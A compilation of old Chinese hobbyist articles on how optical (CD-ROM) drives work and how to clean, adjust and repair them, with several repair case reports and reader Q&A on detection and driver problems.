        一般光驱出现不读盘，或者读盘不好的现象多半是由激光头灰尘过而多引起的。清洗激光头是整个清洗光驱过程中最麻烦的地方。光头透镜一般就在主轴电机旁边，是一个淡蓝色绿豆大小的东西（^11030502g^7）。这个蓝色激光头透镜固定在弹性物体上，注意擦拭时不能用力过大否则会使光头偏移。有条件的朋友擦拭光头透镜前，可以用放大镜看看光头透镜上的灰尘有多少。少的话，用一根脱脂棉签轻拭几下即可。如果较多的话，可以先用棉签擦拭一遍，再用溶液清洗。关于擦洗光驱的溶液最好使用纯度比较高的无水乙醇，有些人认为乙醇会溶解光头透镜上的涂层。其实光头透镜上的涂层是由氟化镁构成，氟化镁薄膜起的作用是减少折射，增加透明度。而无水乙醇根本不会溶解氟化镁，所以用乙醇清洗激光头透镜会溶解有机涂层的说法，未免有点夸张。关于棉签再谈一点，医用的大棉签上面有太多的纤维，绝对不行。超市中卖的那种比较细小的可以用。如果实在找不到这样的棉签，并且激光头透镜的灰尘又不多，那么大家也可以找一根新香烟，拔下过滤嘴，从中间撕开，去掉外边那圈纸露出过滤丝，对折好，然后就可以用过滤嘴上的过滤丝来擦拭光头透镜了。
        3.调节激光头功率
        在激光透镜的旁边或下侧，一般会有绿豆大小的电位调节器。它靠加大或减小电阻来改变电流的强弱，从而调节激光头的发射功率。它的外形有点像螺丝帽，因此可以用小起子或是修理钟表的那种小螺丝刀来进行调节。顺时针或逆时针调节，以5度为基准进行调整。每调整一次就加电检验一下光驱的读盘效果，直到满意为止。但切记不可调节过度，功率过大将会导致激光头烧毁。


光驱的基础知识和工作原理

《一键清理系统垃圾》

光驱的基础知识和工作原理

  一．光驱的基础知识

    在谈如何挑选优秀的光驱之前，我们先要了解有关光驱的一些概念。首先我们说说什么是CLV和CAV。光盘和硬盘的工作方式有很大的不同，硬盘的的盘片是被分成许多同心圆，这些同心圆成为磁道，每个磁道又被分为了若干的扇区，文件就是被保存在这些扇区内，因此，硬盘的盘片总是以恒定的角速度旋转，这就是CAV。但是，由于盘片具有一定的半径，这就势必会引起扇区在盘片内外圈的疏密程度不同，对读取数据造成了很大的不遍。

    CD-ROM是采用一个连续的旋转形的轨道来存储数据的（有点类似音轨的概念），这些轨道被分成相同尺寸，相同密度的区域，因此，使盘片的利用率得到进一步的提高。由于光盘上的数据是以相同的密度存放的，因此在读取光盘的时候就要采取恒定的线速度，这就是CLV。恒定线速度带来的直接影响就是光驱在读取内外圈数据时盘片的旋转速度会大为不同，这就需要光驱的主轴马达不断改变旋转速度以适应读取数据的需要。读者可以想到，频繁地变换速度势必会引起马达寿命的减少。但由于早期的光驱，主轴马达速度不是很快，因此没有什么大关系，随着光驱速度的不断提高，不断变换马达速度对于光驱寿命影响的问题就日益严重起来，因此，目前的高速光驱都采用了CAV技术，即盘片一恒定的线速度转动。虽然这样做延长了光驱的寿命，但在读取内圈数据的时候，实际的传输速度会受到一定的影响，因此，一些高档的光驱又采用了CAV和CLV结合方式。这种方式在读取内圈数据的时候采用CAV方式，而在读取外圈的时候就采用CLV，这样一来，光驱的性能又得到了进一步的提高。在选购光驱的时候，应当尽量选用采用CAV/CLV技术的光驱。

    光驱的传输速度是影响其性能的一个重要因素。单倍速光驱的传输率是150KB/s，40倍速的光驱传输速度就是40 X 150KB/s，所以，速度越快的光驱，其传输速度就越快。光驱的传输模式对传输速度也有影响。目前的主要模式有PIO和Ultra MDA/33(UMDA33)两种。相比起来，UMD模式的光驱CPU占有率更低，并且可以提高提高I/O系统的速度等等。此外，光驱的寻道时间以及缓冲区也影响着光驱的性能。寻道时间就是指激光头在接受到读取数据的命令后将光头调整早技术数据的轨道上方所用的时间。因此，光驱的寻道时间是越短越好。缓冲区（Buffer）对于光驱的性能影响也较大。缓冲区大的光驱在读取文件时其速度优势明显，在购买的时候应选购Buffer较大的产品，不过采用大容量Buffer的光驱价格普遍比较昂贵。目前主流光驱均采用128KB的缓冲区。光驱的接口分为IDE和SCSI两种。采用SCSI接口的光驱性能优势明显，它具有更小的CPU占用率，更稳定的传输速度等。但SCSI接口的光驱价格比较昂贵，因此家庭选购光驱还是选择IDE接口为好。

    随着万转光驱的出现，光驱主轴马达速度已经达到了非常快的速度。因此在读盘的时候，会产生巨大的震动以及噪音。为了应付这些负面影响，厂商可以说是不惜血本，开发自己的防震动技术。橡胶减震支架就是在这样的情况下产生的。橡胶支架将光驱的托盘与前仓盖分割开，减少了震动。这对于减低光驱的噪音作用显著。此外，为了提高光驱激光头的精准度，目前的高档光驱都采用了悬挂式光头结构，使光头的寻址和聚焦时间减少许多，并且大幅提高了光驱的读盘能力。ABS自动平衡系统也是近期开发的一种先进技术（注意，不是汽车上的ABS）。ABS技术在光驱托盘下面放置滚珠以提高光驱读取密度不均的盘片时的性能，这对于中国的光盘市场作用很大。目前国内大量D版盘充斥着市场，而这些盘片的质量通常很差，因此，ABS技术就发挥了它的威力。当光驱读取密度不均的盘片时，托盘下的滚珠由于离心力的作用，会跑到质量轻的那一边从而调整平衡。除此以外，像金属机心，智能控制电路等新技术也被应用在某些品牌的光驱上，它们都可以提高光驱的寿命和读盘能力。

    二．光驱的工作原理

    让我们来了解一下光驱的工作原理。激光头是光驱的心脏，也是最精密的部分。它主要负责数据的读取工作，因此在清理光驱内部的时候要格外小心。激光头主要包括：激光发生器（又称激光二极管），半反光棱镜，物镜，透镜以及光电二极管这几部分。当激光头读取盘片上的数据时，从激光发生器发出的激光透过半反射棱镜，汇聚在物镜上，物镜将激光聚焦成为极其细小的光点并打到光盘上。此时，光盘上的反射物质就会将照射过来的光线反射回去，透过物镜，再照射到半反射棱镜上。此时，由于棱镜是半反射结构，因此不会让光束穿透它并回到激光发生器上，而是经过反射，穿过透镜，到达了光电二极管上面。由于光盘表面是以突起不平的点来记录数据，所以反射会来的光线就会射向不同的方向。人们将射向不同方向的信号定义为“0”或者“1”，发光二极管接受到的是那些以“0”，“1”排列的数据，并最终将它们解析成为我们所需要的数据。这就是光驱的工作原理。

    在激光头读取数据的整个过程中，寻迹和聚焦直接影响到光驱的纠错能力以及稳定性。寻迹就是保持激光头能够始终正确地对准记录数据的轨道。当激光束正好与轨道重合时，寻迹误差信号就为0，否则寻迹信号就可能为正数或者负数，激光头会根据寻迹信号对姿态进行适当的调整。如果光驱的寻迹性能很差，在读盘的时候就会出现读取数据错误的现象，最典型的就是在读音轨的时候出现的跳音现象。

    所谓聚焦，就是指激光头能够精确地将光束打到盘片上并受到最强的信号。当激光束从盘片上反射回来时会同时打到4个光电二极管上。它们将信号叠加并最终形成聚焦的信号。只有当聚焦准确时，这个信号才为0，否则，它就会发出信号，矫正激光头的位置。聚焦和寻道是激光头工作时最重要的两项性能，我们所说的读盘好的光驱都是在这两方面性能优秀的产品。


光驱的日常保养与故障排除

《一键清理系统垃圾》

光驱的日常保养与故障排除

   在一台电脑的众多设备中，光驱算是寿命最短的一个了。往往一台新光驱使用一年左右就会出现读盘速度变慢、不读盘等这样或那样的问题。如果在光驱的日常使用中注意保养和维护，会大大延长光驱的寿命。

   日常保养

   保持光驱清洁
   光驱出现读盘速度变慢或不读盘的故障，主要是激光头出现问题所致。除了激光头自身寿命有限的原因外，无孔不入的灰尘也是影响激光头寿命的主要因素。灰尘不仅影响激光头的读盘质量和寿命，还会影响光驱内部各机械部件的精度。所以保持光驱的清洁显得尤为重要。首先要尽可能保持室内的清洁，减少灰尘。
   清洁光驱内部组件和激光头。对于光驱的机械部件一般使用棉签擦拭即可，而激光头的清洁有很高的危险性，稍不留意就会造成激光头的损坏，所以如果光驱在保修期内最好交由经销商处理。如果过了保修期也要找个有过拆卸光驱经验的人来指导。另外清洁激光头不能使用酒精和其他清洁剂，可以使用气囊对准激光头吹掉灰尘。
   注意光盘质量
   光驱的工作就是读取光盘上的内容，如果经常使用质量较差的光盘必定会使光驱寿命减少。另外也要注意光盘的清洁和保持盘面的完好，大家都知道激光头是在光盘的下方读取光盘的，所以如果光盘上有大量的灰尘，那么在光驱读盘时灰尘就会落到激光头上。我经常看到一些朋友的光盘被划的面目全非，放到光驱中很久才能读出内容，如果光驱经常读取这样的光盘，会加速光驱的机械磨损，寿命就会降低。所以保护好光盘也就是间接的保护光驱。
   多使用虚拟光驱
   最好的延长光驱寿命的方法就是尽可能少地使用光驱。许多人喜欢用光驱听CD，看VCD，这样必然造成光驱磨损，好在现在的硬盘都很大，完全可以利用虚拟光驱软件将CD、VCD和光盘游戏虚拟到硬盘中，虚拟光驱不但速度比真正的光驱快许多也可以延长光驱的寿命，何乐而不为呢。现在比较出色也是比较常用的虚拟光驱软件是Virtual Driver2000。最新的6.1版本可以在Windows 2000 下使用。
   用我的阿帕奇48x光驱拷贝一部影片（两张光盘）到硬盘上只需要十几分钟，而使用直接从光盘读取的方式观看影片需要90分钟，这样就可以节省70分钟的光驱寿命。
   养成正确使用光驱的习惯
   我发现许多朋友不注意光驱的正确使用，比如直接用手关闭仓门、在光盘高速旋转时出仓、关闭或重起计算机时不取出光盘等。这些不好的习惯直接影响光驱的使用寿命。如光盘不用时，最好将它从光驱中拿出来，因为只要是开着电脑，即使你不使用光驱，光驱也一直处于工作状态。除非你想一年换一个新光驱，否则就要养成正确使用光驱的习惯。这里我向大家介绍一个保护光驱的小软件：“光驱护理2001”对你保护光驱很有帮助，“光驱护理2001”同时也是一款很好的光驱工具。它可以避免手动进仓、出仓给光驱带来的伤害，在弹出仓门时会自动延迟确保光盘完全停止旋转，而且具有CD播放、停止功能。
   光驱用久了便会经常出现这样或那样的问题，给大家带来许多麻烦。大家经常会选择更换，其实光驱的故障并不是很严重，如果你掌握一些光驱故障判断维修的方法加上适当的工具，完全可以自己亲手修好光驱。

   故障排除

   挑盘或不读盘
   挑盘或不读盘是光驱经常遇到的故障，造成此故障的原因很多，但主要是因为激光头老化或灰尘太多导致。光驱挑盘，问题主要出在光驱的压盘机构，部分光盘的盘片很薄，而光驱的设计是以标准盘片为基准的，光驱压盘机构夹不紧光盘，盘片在光驱里打滑，这样就造成光驱挑盘。解决的方法就是把光驱的压盘机构调的紧些，或加厚光盘。就是在光盘孔周围贴上不干胶，以增加压盘机构同盘片的接触。如果还是不行，就要调整激光头的发射功率了，不同品牌光驱的调节电位器的位置是不同的，但大部分在激光头的前侧面，如Acer 50x、源兴40x。在调节前先记住原来的位置，如果不行再调回来。光驱不读盘首先观察主导电机的工作情况，如果主导电机无动作，就要先检查主导电机的电源供给是否正常、电机的传动皮带是否打滑、断裂。状态开关是否开关自如，因为如果开关不到位，主导电机得不到启动信号也不能启动；光驱读盘主要是激光头的问题，一般来说清洁激光头后情况会有所改善。如果是激光头或其他元器件老化的原因除了更换没别的办法。
   无法开关仓门
   光驱不能正常开关仓门，主要是光驱机械故障或光驱内有异物导致。如果不是碰撞等意外导致仓门变形就应检查光驱内部是否有异物堵塞或机械部分出现问题导致。
   最后要提醒大家的是，光驱是精密设备，拆卸光驱时稍有不慎就会造成严重的后果，所以如果不是光驱故障严重最好不要轻易打开光驱。

作者：
来源：中国电脑教育报


光驱电动机转轴引起的故障

《一键清理系统垃圾》

光驱电动机转轴引起的故障

    光驱是最容易损坏的电脑配件，一般使用一两年，光驱的读盘能力都会有明显的下降。光驱的正确维护是延长光驱使用寿命的一项重要手段。
    笔者使用的是一款新加坡创新公司1997年出品的8倍速光驱，三年来它一直“任劳任怨”工作，从不挑盘。可是最近一个月来，在使用中发现光驱的读盘能力明显下降，具体表现为在插入一张以前可以读出的光盘时，寻址时间明显增长，读取数据，时有中断。怀疑是激光头老化所致，小心地拆开光驱，直到露出光头部位，调小功率调节电位器阻值（激光头组件侧面一米粒大小的可调电阻）以增大激光头功率（一次不能调得过多，以免加速激光头老化）。本以为这样一来会大功告成，连忙装机试用，但事与愿违，问题没有得到丝毫的改善。一愁莫展之际，突然感觉到光驱运转的声音很大，同时还伴随着光头伺服系统来回调光头位置的声音。会不会是光盘夹具或主轴马达工作不良而造成光盘转动不平稳，使激光头不能很好地读取数据？再次打开光驱，仔细检查上述两个部位，发现夹具到位良好，光盘没有松动。用手轻轻转动和晃动主轴马达的转子部份，发现手感很涩，并有少许松动。小心地拨开旁边的塑料卡锁，用力提出马达转子，发现转轴巳轻微磨损，并沾有许多金属碎渣。用干净的棉布清除碎渣，在转轴上滴上一点轻质机油，小心地装回原位。上机测试，故障消失。
    笔者认为光驱长期地高速运转，润滑油干涸，加速了主轴马达转子转轴的磨损，使光盘运转不平稳，是造成光驱性能下降的又一罪魁祸首。


光驱电源接口故障维修

《一键清理系统垃圾》

光驱电源接口故障维修

  朋友一光驱，使用一直正常。一次因给另一朋友试机而取出光驱，重新装好后不能读盘。表现为指示灯亮，进出仓正常，但就是不读盘。

    开始以为是数据线未插好之故，重插多次后还是不行。没法，取出光驱，放在机箱外接好电源、数据线后却能读盘了。装入机箱后又不能读盘。取出后又一切正常。试了多次都是如此。怀疑是机箱问题，经仔细检查，排除是机箱故障问题。百思不得其解。

    取出光驱拆开，拿在手上翻来覆去地看，没发现有什么问题。本着DIY的精神和自己对电子知识的皮毛之功，仔细地寻找着蛛丝马迹。一次轻轻地摇了摇电源D型插，发觉有点不正常，好像有点响声，仔细一看并无断裂痕迹。再一摇，还是有点响，于是用镊子一个脚一个脚地挑，最后在接黄线的那一脚上发现松动现象。用表一测，果然是它断了。这一断脚断得可真绝，锡点外面完好，根本看不出来，是锡点里面断了，一摇就能听见响声，如果不仔细地摇或用表测根本就看不出来。

    问题找到了，当然就好解决了。于是插上烙铁一下搞定。装入机箱，接好电源，数据线，放入光盘，一切正常。

    分析：原来朋友的机箱是卧式的，装入光驱后再插电源时有一个由上往下的力，这样就使可能早已断了的脚被挤开。断的脚是黄线，它提供的是12V的电压，由于中断导致了光驱工作不正常。至于托盘可以正常进出，应当是因为托盘的电机使用的是电源供给的5V电，而并非12V，所以没有受到什么影响。


光驱故障的判断

《一键清理系统垃圾》

光驱故障的判断

  故障现象：当光驱出现问题时，一般表现为光驱的指示灯不停地闪烁、不能读盘或读盘性能下降；光驱盘符消失。光驱读盘时蓝屏*机或显示“无法访问光盘，设备尚未准备好”等提示框等。

    以下，笔者按光驱的安装到使用过程的先后顺序来说明相关故障的判断：

    1.光驱连接不当造成

    光驱安装后，开机自检，如不能检测到光驱，则要认真检查光驱排线的连接是否正确、牢靠，光驱的供电线是否插好。如果自检到光驱这一项时出现画面停止，则要看看光驱（主、从）跳线是否无误。
    提醒：光驱尽量不要和硬盘连在同一条数据线上。

    2.内部接触问题

    如果出现光驱卡住无法弹出的情况，可能就是光驱内部配件之间的接触出现问题，大家可以尝试如下的方法解决：将光驱从机箱卸下并使用十字螺丝刀拆开，通过紧急弹出孔弹出光驱托盘，这样你就可以卸掉光驱的上盖和前盖。卸下上盖后会看见光驱的机芯，在托盘的左边或者右边会有一条末端连着托盘马达的皮带。你可以检查此皮带是否干净，是否有错位，同时也可以给此皮带和连接马达的末端上油。另外光驱的托盘两边会有一排锯齿，这个锯齿是控制托盘弹出和缩回的。请你给此锯齿上油，并看看它有没有错位之类的故障。如果上了油请将多余的油擦去，然后将光驱重新安装好，最后再开机试试看。

    提醒：不过由于这种维修比较专业，建议大家最好找专业人士修理。

    3.CMOS设置的问题

    如果开机自检到光驱这一项时出现停止或*机的话，有可能是CMOS设置中的光驱的工作模式设置有误所致。一般来说，只要将所有用到的IDE接口设置为“AUTO”，就可以正确地识别光驱工作模式了。对于一些早期的主板或个别现象则需要进行设置。

    4.驱动的问题

    在Windows系统中，当主板驱动因病毒或误*作而引起丢失时，会使IDE控制器不能被系统正确识别，从而引起光驱故障，这时我们只要重新安装主板驱动就可以了。
    另外，当一个光驱出现驱动重复或多次安装等误*作时会使Windows识别出多个光驱，这会在Windows启动时发生蓝屏现象。我们只要进入Windows安全模式（点选“我的电脑→属性→CD-ROM”）删除多出的光驱就解决了。

    5.光驱不支持DMA

    早期的光驱可能不支持DMA，可以将光驱的DMA接口关闭以免造成不兼容等现象。完成设置后，按下“确定”按钮，重新启动电脑即可。
    DMA接口光驱与主板不兼容时，也应关闭DMA。如果你真想发挥一下光驱DMA所带来的性能的话，建议升级主板的BIOS或光驱的固件（Firmware）。另外，光驱使用久后，会出现读盘不稳定的现象，我们可以试着关闭DMA，以降低性能，提高稳定性。

    6.虚拟光驱发生冲突

    我们在安装光驱的同时，一般会装个虚拟光驱使用。但安装虚拟光驱后，有时会发现原来的物理光驱“丢失”了，这是由于硬件配置文件设置的可用盘符太少了。解决方法：用Windows自带的记事本程序打开C盘根目录下的“Config.sys”文件，加入“LASTDRIVE=Z”，保存退出，重启后即可解决问题。
    在安装双光驱的情况下安装低版本的“虚拟光碟”后，个别情况会表现为有一个或两个物理光驱“丢失”！建议：换个高版本的或其它虚拟光驱程序。

    7.激光头老化造成

    排除了灰尘造成的原因，如果光驱还不能读盘很可能是“激光头”老化了，这时就要调整光驱激光头附近的电位调节器，加大电阻改变电流的强度使发射管的功率增加，提高激光的亮度，从而提高光驱的读盘能力。

    提醒：大家用小螺丝刀顺时针调节（顺时针加大功率、逆时针减小功率），以5度为步进进行调整，边调边试直到满意为止。切记不可调节过度，否则可能出现激光头功率过大而烧毁的情况。


光驱故障检修两例

《一键清理系统垃圾》

光驱故障检修两例

最近遇到了两个较为典型的光驱故障，特此写出来供大家参考，希望能给大家一点帮助。

这两个光驱分别是1997年、1998年的产品，一个是精英SMART100x，一个是华硕34x，他们的故障现象是一样的，都很奇特：光驱中如果没有任何光盘的话，光驱的托盘无法弹开；光驱中如果事先放入了一张光盘的话，光驱的托盘弹出就非常顺畅。用户介绍说他们只好每次都放一张光盘到光驱中，如果稍不注意而忘记放置一张光盘的话，那就麻烦了：华硕34X的稍微方便一些，但还是需要关机断电，而且要用一个曲别针才能把它戳开，而精英SMART100x则比华硕34x要难戳开得多，时间久了又害怕把传动齿轮戳坏了，只好大动干戈──拆开，通电，把光驱中的托盘上压盘提起，按下弹出开关，放入一张光盘再装上。

图1

据用户介绍，这两只光驱都曾请人检修过，光驱托盘电机的传动皮带都已经更换过，但是没有用到一个星期，故障又出现了，并且还出现了光驱噪声明显变大、读盘能力显著下降的新问题。

检修：首先检查的是华硕34x光驱，拆开光驱外壳，露出机芯，先用手轻轻按压光驱托盘电机的传动皮带，感觉还是有点松弛，接上电源，在里面有光盘的情况下观察，光盘上压盘转动不均匀，导致光盘转速不均匀，而且有碰撞摩擦的噪声。在里面没有光盘的情况下观察，当按下弹出按钮时，光盘上下托架吸合得很紧，下托架根本不能下降，光盘托盘电机的传动皮带也显得无力打滑，拆下光盘上压盘托架的螺钉，检查金属托架发现它被人扳变形了，仔细将它扳平，注意一定要使它尽可能平整，否则就会出现上述噪声变大、读盘能力下降的问题。因为光驱托盘的进出主要是靠机械传动，即电机通过皮带带动齿轮转动，推动光驱托盘的运动。而光盘上下压盘托架只是起到固定光盘并保证光盘做匀速转动的作用，所以我们在检修之前一定要弄清楚问题的根源。给该光驱换上一根直径比原来的小1-2mm的皮带，问题解决，至今已正常使用了两个月。

图2

精英SMART100x，参照华硕34x光驱的修理，首先还是更换了一根小直径的皮带，但是故障依然如故，看来这个光驱不仅仅是传动皮带的问题，动力传动的其它部分可能也存在障碍，卸下光驱压盘托架，由于机械传动过程中没有了上下托盘间卡紧光盘的磁性阻力，托盘进出比较顺畅。

据此，抽出托盘，再卸下光驱托盘组件，这样整个机械传动部分就全部暴露出来了，仔细观察，塑料齿轮、光驱托盘组件运动导轨（图1）均没有发现损坏、变形的问题，但在卸下光驱托盘组件运动导轨时发现，导轨槽中出厂时涂抹的白色润滑油已经变成乌灰色，用手摸时感觉干涩，再看光驱托盘组件上的运动导头（图2）上面，也是干涩不平的，问题就出在这里！由于长时间的使用，导头与导轨槽长期摩擦而导致磨损，加之润滑油上吸附一些灰尘干涸，造成导头与导轨槽之间的摩擦力阻力和光盘上下托盘的磁力之和大于电机的动力，使光驱托盘进出困难。当有光盘在光驱里时，由于光盘的重力会抵消一部分阻力，使电机动力又能大于阻力，所以在光驱中有光盘时托盘的进出比较顺畅。把导头与导轨槽、齿轮上的润滑油擦拭干净，对这些部位涂上适量的优质润滑油，重新装好各个部件，问题彻底解决。


光驱故障维修几例

《一键清理系统垃圾》

光驱故障维修几例

光驱共处故障

    Q 一读者：

    我攒了一台电脑，配置为PⅡ350、源兴36X光驱、SB64声卡、微星6163主板。由于老机子的声卡和光驱还能使，就把他们也装上了(声卡为ALS007、光驱为HITACHI 4X)，ALS007声卡和旧光驱连在一起了。刚开始时还可以很好地共存，后来，不知为什么无论在旧光驱中放VCD还是软件，它只能出现Audio CD的字样，什么也读不出来。请问，这是由于我设置的问题还是由于光驱太老了或由于别的问题，怎样设置才能使双光驱共处？

    A 先单独把该光驱在别的电脑上测试，看旧光驱有无变化。如没有变化可以把新旧光驱分别连接在第二个IDE接口上的主、辅设备。Win 98会自动识别两个光驱。如果需要在DOS下安装，请在Autoexec.bat中设置MSCDEX/D1:MSCD001/D2：MSCD002，当然在Config.sys中的Device两条语句中分别使用名字Mscd001和Mscd002。名字不一致将导致安装失败。

    如果还有问题，请将旧光驱做备用。使旧光驱影响新光驱实在是得不偿失。我推荐这个方案。

    共享光驱故障

    Q lobin@21cn.com:

    不久前，我(在并口上)选用IPX协议将两台电脑通过“直接电缆连接”方式互联，在设置好共享驱动器，文件夹和主、客户机后便开始连接了。但两台机器无论怎么折腾都只能实现客户机对主机的单向访问，主机却连客户机的一个Bit都看不到。不知是何道理？另外在检测完用户名和密码后，计算机会报告找不到主机的共享文件夹，输入主机名后正常。

    另外,我有一个40x CDROM:接在Sec Master上,经检测Maximum speed:7040kBytes/s,自带缓存128KB,Windows追加高速缓存为1238KB,访问方式设为“四倍速或更高”，品牌不清楚，使用不到3个月，读任何光盘都很慢，还不如24x的。请问这是为何？

    A 请安装NetBEUI通讯协议。上述两电脑是否使用的是相同的操作系统，如使用Win 98和Win 95不好，最好使用相同版本的系统。两电脑的并行口请设置为相同的模式，设置在Setup中的“Chipset Features Setup”、“Parallel Port Mode”。资源共享的设置在“控制面板”、“网络”、“配置”、“文件及打印共享”，选择“允许其他用户访问我的文件”和“允许其他用户访问我的打印机”。

    测速软件有时可能受其他因素的干扰。光驱通常在3个月后纠错能力明显下降。因此衡量光驱好坏的一个重要标志就是3个月后的纠错能力下降到什么程度。显然，您的那个光驱的质量并不好，但光驱大多是3个月保修。若是半年或一年保修，请赶快修理。

    光驱读盘故障

    Q 一读者：

    我的电脑近期在运行光碟，点击选项时，常常死机，并出现提示行：

    A fatal exception OE has occurred at 015F: BEF9E01F.The current application will be terminated.

    A 可能是光驱纠错能力下降，供电质量不好。请把光驱安装在别的电脑上测试。如果故障依旧。请清洗或更换光驱。否则，请检查供电情况。若光驱使用的电源线上有连接软驱的电源线，请换另外的单独的电源线。使用电脑时尽量使用单独的电源插座，不要将所有电器都打开，尤其是空调和电视等电器同时打开。

    光驱检测慢

    Q 北京王海滨：

    赛扬266，华硕P2E－B，32MB，5.1GB，Eagle T9850，SC 1938声卡，24x泰格光驱，Pwin 98。

    启动后，屏幕上显示“……Detecting HDD Secondary Master ……LIN341……”时，要等30到50秒，然后才能启动Win 98。驱动光盘上有软件“Client Manager”。可以检查系统、DMI兼容组件等信息。运行后显示“The CPU fan，That is used to cool Your computer，has stopped functioning”，风扇转速显示只有3897转。运行“Client Manager”时，出现“找不到.dll文件，Wcdmi.dll”。后来，我在软件所在目录里找到了它——Wcdmi.dll。于是将该文件复制到WINDOWS\SYSTEM目录中，重新开机运行，提示“Timed Out Waiting for INIT COMPLETE message from”。
    A 假如新的光驱就这样慢，请借一个试试。是该光驱与主板有不兼容的地方，还是该光驱曾经比较快，现在慢了，即光驱硬件上有变化。也可以把光驱设置成第一个IDE口的辅盘或第二个IDE接口的辅盘，看光驱被检测的速度如何？这样可以检测主板接口问题。

    CM软件对CPU风扇的测试可能不很准确。请在高级格式化后重新安装Win 98，然后直接安装CM，看是否有找不到文件的故障。如果还有，请使用更新的版本。赶快买Modem上华硕网站上去转转。

    光驱丢失

    Q 一读者：

    今天早晨开机，发现光驱的图标没有了。检查到“硬盘控制器”里的两个记录前有黄色的感叹号。记得昨天新安装了几个软件。

    另：有一台COMPAQ Computer 光驱在 “我的电脑”中找不到了,打开“控制面板”、“系统”、“设备管理器”、“硬盘控制器”，见“Primary IDE controller (dual fifo)”，“Secondary IDE controller(dual fifo)”两者前带问号，说明此两设备有问题，但不知是怎么引起的，也不知道如何去解决，我又不想重新安装Windows，望赐教!

    A 请先启动KV300杀毒软盘，执行KV300检查/清除病毒。一种CMOS destroyer －B引导区病毒就是这样的现象。它影响电脑速度，破坏或重新写引导区，破坏或覆盖文件。

    若上面的方法行不通，请一个个地卸载昨天或刚刚安装的软件，直到发现了破坏光驱驱动的应用软件。

    需要说明的是：关机后打开机箱，替换上旧的或其他品牌的光驱，系统自动识别了旧光驱，替换原来的光驱，光驱图标恢复。没有旧光驱的可以尝试先去掉光驱的物理连接进入Win 98并关机后，再连接上。由于Win 98的自动检测光驱能力强于Win 95，因此光驱丢失现象相对减少，恢复也相对容易。

    最后的绝招也是重新安装系统。我见过CMOS病毒传染系统使“硬盘控制器”中有黄色的符号，杀毒后找回了光驱。


光驱故障维修两例

《一键清理系统垃圾》

光驱故障维修两例

1.故障现象：一台50×光驱，放入光盘后无主轴马达加速及转动声，机器提示找不到光盘。

    故障分析：初步怀疑是光驱主轴电机损坏，拆开光驱外壳，放入光盘，发现光盘缓慢旋转，说明主轴电机没有问题。由此推断可能是激光头出现故障，不能检测到光盘。目测检查连接光头的数据线完好，但清洗光头后故障依旧。这时联想到以前修理光驱时，当调整光头功率电位器旋转角度较大时，电位器触点滑动到接触区以外，电阻变得无穷大，光头供电被切断，这时光驱主轴电机无法加速到数据读取速度。因为该光驱以前读盘一直很流畅，上述故障是突然出现，因此断定是光头电位器接触不良，影响光头的功率输出，导致无法识别光盘。

    故障解决：稍微调整光头电位器，使触点移离接触不良点，故障排除。

2.故障现象：一台24×光驱，读盘不正常，有时读得好好的盘，放进去却提示设备没准备好。

    故障分析：首先怀疑是光头电位器接触不良，调整后问题依旧存在。清洗光头和光头传动丝杆，无数次调整功率电位器，仍然无法解决问题。进一步怀疑是连接光头的数据线有问题。从能正常工作的相同品牌的光驱上取下数据线换上，毛病依旧。找不到症结，只能怀疑是光驱电路板工作不稳定，于是又在电路板上折腾了一两天，仍然无功而返。会不会光驱接口有问题呢？拿过光驱仔细一看，果然发现光驱IDE接口的一个针脚短了一截，经观察原来在插接数据线时这个针脚硬度不够，被挤得向旁边歪斜，造成接触不良。

  故障解决：用小镊子把歪斜的针脚慢慢拨正，然后重新装上光驱，开机检验，故障排除。

总结：由以上例子可以看到，虽然大多数光驱读盘能力下降或者根本不能读盘，是因为光头输出功率不足引起的，当调整光头功率不能解决问题时，要从故障现象分析可能原因，一项项排除，只要有耐心，故障总能解决的。


光驱简易故障的维修

《一键清理系统垃圾》

光驱简易故障的维修

一、 开机检测不到光驱或者检测失败

    可能原因及排除：
    1、光驱LDE接口插接不良———重新插好、插紧。
    2、硬盘数据线由于鼠咬、虫蛀等原因损毁———更换。
    3、跳线错误———重跳。

    二、进出盒故障（不能进出盒或者进出盒不顺畅）

    可能原因及排除：
    1、进出盒仓电视插针接触不良或电视烧毁———重插或更换。
    2、基础盒机械结构中的传动带（橡皮圈）松动打滑———更换尺寸小一些的传动带。

    三、进给电视故障

    故障现象：出入正常，但放入光盘后光驱做几次加速读盘动作（可以从声音上判断出来），然后一直高速旋转读盘，但仍读不出信息。
    可能原因及排除：进给电视插针接触不良或者是电视烧毁———重插或更换。

    四、激光头故障

    故障现象：挑盘（有的盘只能读，有的盘不能读）或者读盘能力差。
    可能原因及排除：光驱使用时间长或常用于看VCD或听CD，使激光头物镜变脏或老化———用棉花擦干净激光头物镜可改善读盘能力，而对于激光头老化则可调节激光电路上的可调电阻以增大激光的发射功率来解决。

    五、激光信号通路故障

    故障现象：
    1、加电后，指示灯闪动约10秒后停止，按出盒键，盒能伸出，但放入盘片后又马上被弹出。
    2、加电后，指示灯闪动约两三秒后停止，出入盒正常，盘片入盒后，旋转一下就停止，读不出数据。
    3、放入盘片后，指示灯快速闪动不停，但读不出数据来。
    4、放入盘片后，光驱作几次加速动作，尝试读出数据（由声音也可辨别出），稍后停止，读不出数据。由于机型不同可能尝试读盘的次数不同。
    激光信号通路故障指的是激光头与电路板之间的连接线，一般为一条扁平硬直的塑料导线，它是激光与其他电路信息交换的通道。此处产生的鼓掌较多，但维修却很简单，只要把这条导线换一条就可以了。

    六、主轴信号通路故障

    一般情况下，主轴电机与其驱动电路是合二为一的，我们把它称为主轴信号通路，此电路也由一条与激光信号通路连线一样的连接，只不过股数不一样。由于它与激光头信息通路都是由伺服电路进行信息沟通的，因而，在故障现象上有许多相似的地方，但由于激光头信息通路在进出盒时，其连接线易被拉折而损坏，所以在遇到相同故障现象时应先考虑激光头信息通路故障，在考虑主轴信号通路故障。在此，我只把该电路出现的一些特殊现象罗列出来供大家参考。
    1、加电后指示灯闪动不止，但盘片不转；
    2、读盘加速的声音和振动特别大，重复几次后停止，但读不出数据。


光驱简易故障的维修

《一键清理系统垃圾》

光驱简易故障的维修

    光驱是电脑硬件中使用寿命最短的配件之一。其实很多报废的光驱仍有很大的利用价值，只要略微维修一下就可以了。这往往不需要具有什么高深的无线电专业知识，也不需要使用什么太复杂的维修工具及材料，因而我把这类故障叫做光驱的简易故障。你只要细心观察故障现象并参照执行下面的一些排除方法，相信你的老光驱还是能恢复昔日“风采”的。
    不过，首先还得让我们先来了解一下光驱的几个基本结构知识。
